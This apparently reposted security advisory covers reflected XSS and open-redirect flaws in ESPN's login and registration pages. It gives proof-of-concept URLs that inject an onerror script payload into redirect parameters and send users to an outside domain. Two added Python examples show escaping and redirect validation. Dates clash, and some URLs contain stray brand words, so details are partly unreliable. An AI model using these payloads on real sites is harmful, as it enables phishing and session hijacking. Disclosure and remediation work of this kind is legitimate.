Computer Technology Hut

Day: 2014-12-24


ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Web Security Vulnerabilities

Posted by BlackWhite


Domain:
http://espn.go.com/

 

“ESPN (originally an acronym for Entertainment and Sports Programming Network) is a U.S.-based global cable and satellite television channel that is owned by ESPN Inc., a joint venture between The Walt Disney Company (which operates the network, through its 80% controlling ownership interest) and Hearst Corporation (which holds the remaining 20% interest). The channel focuses on sports-related programming including live and recorded event telecasts, sports news and talk shows, and other original programming.

 

ESPN broadcasts primarily from studio facilities located in Bristol, Connecticut. The network also operates offices in Miami, New York City, Seattle, Charlotte, and Los Angeles. John Skipper currently serves as president of ESPN, a position he has held since January 1, 2012. While ESPN is one of the most successful sports networks, it has been subject to criticism, which includes accusations of biased coverage, conflict of interest, and controversies with individual broadcasters and analysts. ESPN headquarters in Bristol, Connecticut. As of February 2015, ESPN is available to approximately 94,396,000 paid television households (81.1% of households with at least one television set) in the United States. In addition to the flagship channel and its seven related channels in the United States, ESPN broadcasts in more than 200 countries, operating regional channels in Australia, Brazil, Latin America and the United Kingdom, and owning a 20% interest in The Sports Network (TSN) as well as its five sister networks and NHL Network in Canada.”(Wikipedia)

 

 

Vulnerability description:

Espn.go.com is vulnerable to XSS (Cross Site Scripting) and Dest Redirect Privilege Escalation (Open Redirect) attacks.

 

Those vulnerabilities are very dangerous, since they occur on ESPN’s “login” & “register” pages, which users regard as credible. Attackers can abuse those links to mislead ESPN’s users, so the success rate of attacks may be high.

 

During the tests, besides the links given in this advisory, a large number of ESPN’s links were found to be vulnerable to those attacks.

 

The programming code flaw occurs on “espn.go.com”’s “login” & “register” pages, in the “redirect” parameter, i.e.

http://streak.espn.go.com/en/login?redirect=

https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com

http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=

https://register.go.com/go/sendMemberNames?regFormId=espn&appRedirect=http://register.go.com/

 

Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0.7601) in Windows 8.

 

Disclosed by:
Wang Jing,
Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)
http://www.tetraph.com/wangjing/

 

 

 

“The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers’ right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!” A great many of the following web security issues have been published there: Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, Unvalidated Redirects and Forwards. It also publishes suggestions, advisories and solution details related to XSS and Open Redirect vulnerabilities, and cyber intelligence recommendations.

 

 

 

(1) XSS Web Security Vulnerability

XSS may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user’s browser session within the trust relationship between their browser and the server. Based on Acunetix, exploited XSS is commonly used to achieve the following malicious results:

  • Identity theft
  • Accessing sensitive or restricted information
  • Gaining free access to otherwise paid for content
  • Spying on user’s web browsing habits
  • Altering browser functionality
  • Public defamation of an individual or corporation
  • Web application defacement
  • Denial of Service attacks

 

 

Vulnerable URLs:

http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459

http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fworld-cup-bracket-linkedin-predictor%2Fvk%2F2014%2Fes%2Fgame%3Famazon%3Dcreate

https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageNamepaypal%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=reddit

https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourYahooAccount/login

 

POC:

http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459"><img src=x onerror=prompt('justqdjing')>

https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=espn"><img src=x onerror=prompt('justqdjing')>

http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate"><img src=x onerror=prompt('justqdjing')>

https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login"><img src=x onerror=prompt('justqdjing')>
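The POCs above all follow one shape: the value of the “redirect” parameter ends up inside a quoted HTML attribute on the login page, and a payload beginning with `">` closes that attribute and its tag so the rest is parsed as a new element. The following example, added here and not part of the original advisory or of ESPN’s code, reproduces that server-side pattern in Python beside the output-encoded fix, and uses the standard library’s HTML parser to show what a browser-like parser makes of each. The form markup, the hostnames and the payload are constructed for illustration.

```python
"""Reflecting a login "redirect" parameter into HTML: the unescaped pattern
beside the attribute-encoded fix, with a parser-based check of the result."""
import html
from html.parser import HTMLParser

# Constructed payload in the shape of the advisory's POCs: a legitimate-looking
# URL, then a closing quote and '>' that end the value="..." attribute and the
# <input> tag, then an injected element carrying an event-handler attribute.
INJECTED = 'http://streak.espn.go.com/en/"><img src=x onerror=prompt(1)>'


def render_login_form_unescaped(redirect):
    """Vulnerable pattern: the request parameter is pasted into an attribute."""
    return ('<form method="post" action="/en/login">'
            f'<input type="hidden" name="redirect" value="{redirect}">'
            '<input type="submit" value="Log in">'
            '</form>')


def render_login_form_escaped(redirect):
    """Fixed pattern: attribute-encode on output. quote=True is what makes
    html.escape replace '"' and "'" as well as '<', '>' and '&'."""
    safe = html.escape(redirect, quote=True)
    return ('<form method="post" action="/en/login">'
            f'<input type="hidden" name="redirect" value="{safe}">'
            '<input type="submit" value="Log in">'
            '</form>')


class _FormInspector(HTMLParser):
    """Record what a browser-like parser sees: every on* handler attribute,
    and the value attached to each named <input>."""

    def __init__(self):
        super().__init__()
        self.handlers = []   # (tag, attribute) pairs such as ("img", "onerror")
        self.fields = {}     # input name -> value the browser would submit

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        for name in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name))
        if tag == "input" and "name" in attrs:
            self.fields[attrs["name"]] = attrs.get("value") or ""


def inspect_form(markup):
    parser = _FormInspector()
    parser.feed(markup)
    parser.close()
    return parser


def script_bearing_elements(markup):
    """(tag, attribute) for every element that carries an event handler."""
    return inspect_form(markup).handlers


def hidden_field_value(markup, name="redirect"):
    """The value the browser would submit for the named input."""
    return inspect_form(markup).fields.get(name)


if __name__ == "__main__":
    for label, render in (("unescaped", render_login_form_unescaped),
                          ("escaped", render_login_form_escaped)):
        page = render(INJECTED)
        print(f"{label}: handlers={script_bearing_elements(page)} "
              f"redirect={hidden_field_value(page)!r}")
```

In the unescaped rendering the parser reports an `img` element with an `onerror` handler and the hidden field has been truncated at the injected quote; in the escaped rendering no handler exists and the hidden field carries the full parameter value, so the form still works but the payload stays inert text. Encoding has to match the context (attribute here); it is not a substitute for also validating the redirect target, which the next section covers.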

 

Poc Video:
https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be

Blog Detail:
http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html

 

espn_go_xss

 

 

(2) Dest Redirect Privilege Escalation (Open Redirect) Web Security Vulnerability

From OWASP, an open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. This could allow a user to create a specially crafted URL that, if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker’s choosing. Such attacks are useful because the crafted URL initially appears to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client-side software such as a web browser or document rendering programs.

 

One webpage is used for the following tests. Its address is “https://computerpitch.wordpress.com/”. Suppose that this webpage is malicious.

 

The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04), and Apple Safari 6.1.6 of Mac OS X Lion 10.7.

 

 

(2.1) Login Page Dest Redirect Privilege Escalation Vulnerability

 

Vulnerable URL 1:

https://r.espn.go.com/members/login?appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial

 

POC:
https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com

 

Vulnerable URL 2:

http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2Fyahoo101882723190828

 

POC:
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com

 

 

(2.2) Vulnerabilities Attacked without User Login

Vulnerable URL 1:

http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Flinkedinstatus%2Febay%2Falibaba%2F539770783556698112

 

POC:
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=http%3A%2F%2Fdiebiyi.com?

This vulnerability was used to demonstrate “Covert Redirect” of Facebook.

Poc Video:
https://www.youtube.com/watch?v=HUE8VbbwUms

 

Blog Detail:
http://www.tetraph.com/blog/covert-redirect/covert-redirect-vulnerability-related-to-oauth-2-0-and-openid/

 

 

Vulnerable URL 2:

http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Freddit%2Fbing%2Ftmallstatus%2Ftmall541002332331606017

 

POC:

http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=http%3A%2F%2Fgoogle.com

 

 

Vulnerable URL 3:

http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=https%3A%2F%2Ftwitter.com%2FYahoo%2Fhao123%2Fstatus%2Fyandex%2F%2Fru%2F541950359917580289

POC:

http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=http%3A%2F%2Fgoogle.com

 

Poc Video:
https://www.youtube.com/watch?v=lCvBt8Elj9w&feature=youtu.be

 

Blog Detail:
http://securityrelated.blogspot.sg/2014/12/espn-espn.html
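Each redirect case in (2.1) and (2.2) is the same defect: the “redirect”, “appRedirect” or “url” parameter is followed without checking where it points. The example below, added here and not taken from the advisory or from ESPN, shows a server-side validator in Python that keeps a redirect only when it stays on an allow-listed first-party host, and a helper that applies it to login URLs of the shape the advisory lists. The allow-list hostnames and the fallback path are constructed assumptions; the rejected cases cover the parsing pitfalls (scheme-relative `//host`, userinfo `@`, look-alike suffix hosts, backslashes, non-HTTP schemes) that defeat naive `startswith`/`endswith` checks.

```python
"""Server-side validation of a post-login redirect target, with the parsing
pitfalls that make naive prefix or suffix checks fail."""
from urllib.parse import parse_qs, urlsplit

# Constructed allow-list of first-party hosts; a deployment would use its own.
ALLOWED_HOSTS = frozenset({"espn.go.com", "r.espn.go.com", "streak.espn.go.com"})
ALLOWED_SCHEMES = frozenset({"http", "https"})
FALLBACK = "/"  # where to send the user when the requested target is rejected


def safe_redirect_target(target, allowed_hosts=ALLOWED_HOSTS, fallback=FALLBACK):
    """Return `target` only if it stays on an allowed host; otherwise `fallback`."""
    if not target:
        return fallback
    # Reject control characters and backslashes before parsing: browsers drop
    # tabs/newlines and treat "\" as "/", so "/\\evil.com" is a relative path
    # to urlsplit but "//evil.com" to the browser.
    if any(ord(ch) < 0x20 or ch == "\\" for ch in target):
        return fallback
    try:
        parts = urlsplit(target)
    except ValueError:  # e.g. unbalanced IPv6 brackets in the host
        return fallback
    if parts.scheme == "" and parts.netloc == "":
        # Relative reference. "//host" has a netloc, so it never lands here;
        # only paths rooted at "/" are kept.
        return target if target.startswith("/") else fallback
    if parts.scheme not in ALLOWED_SCHEMES:  # javascript:, data:, or "" (scheme-relative)
        return fallback
    host = (parts.hostname or "").lower()
    # Exact host match: "espn.go.com.evil.com" and "espn.go.com@evil.com" both
    # fail here, which is exactly where startswith()/endswith() checks go wrong.
    if host not in allowed_hosts:
        return fallback
    return target


def resolve_login_redirect(login_url, params=("redirect", "appRedirect", "url")):
    """Given a login/redirector URL of the shape the advisory lists, extract
    the redirect parameter and return the target the server should use."""
    query = parse_qs(urlsplit(login_url).query)
    for name in params:
        if name in query:
            return safe_redirect_target(query[name][0])
    return FALLBACK


if __name__ == "__main__":
    # Two URL shapes from the advisory: an off-site target and a first-party one.
    for url in ("https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com",
                "http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fhome"):
        print(url, "->", resolve_login_redirect(url))
```

The validator is deliberately strict: it compares the parsed hostname exactly against the allow-list rather than testing whether the string starts with a trusted prefix, and it refuses scheme-relative and non-HTTP targets outright. Where a site needs to send users to a handful of known third-party pages, the cleaner design is to map a short token to each destination server-side and never accept a raw URL in the parameter at all.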

 

 

(3) Those security problems were reported to ESPN in early 2014. However, they are still unpatched.

 

 

 

 

More Details:
http://seclists.org/fulldisclosure/2014/Dec/36
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01417.html
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1303
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register
http://diebiyi.com/articles/security/espn-xss-open-redirect/
https://infoswift.wordpress.com/2014/12/30/espn-are-suffering-serious-xss-and-dest
http://webcabinet.tumblr.com/post/118510631147/espn-are-suffering-serious-xss
https://www.facebook.com/permalink.php?story_fbid=435630669942495
http://guyuzui.lofter.com/post/1ccdcda4_6e6b17e
http://mathswift.blogspot.com/2015/05/espn-are-suffering-serious-xss-and-dest.html
http://inzeed.tumblr.com/post/120775132901/espn-xss-open-redirect
http://ittechnology.lofter.com/post/1cfbf60d_730f11d
http://whitehatpost.blog.163.com/blog/static/2422320542015551014553/
https://zuiyuxiang.wordpress.com/2014/12/19/espn-xss-open-redirect/
https://www.facebook.com/permalink.php?story_fbid=1631949187023558


https://plus.google.com/u/0/110001022997295385049/posts/TBiJP5A3CXg
http://xingzhehong.lofter.com/post/1cfd0db2_6e68fe3
http://www.tetraph.com/blog/computing-science/espn-xss-open-redirect/

 
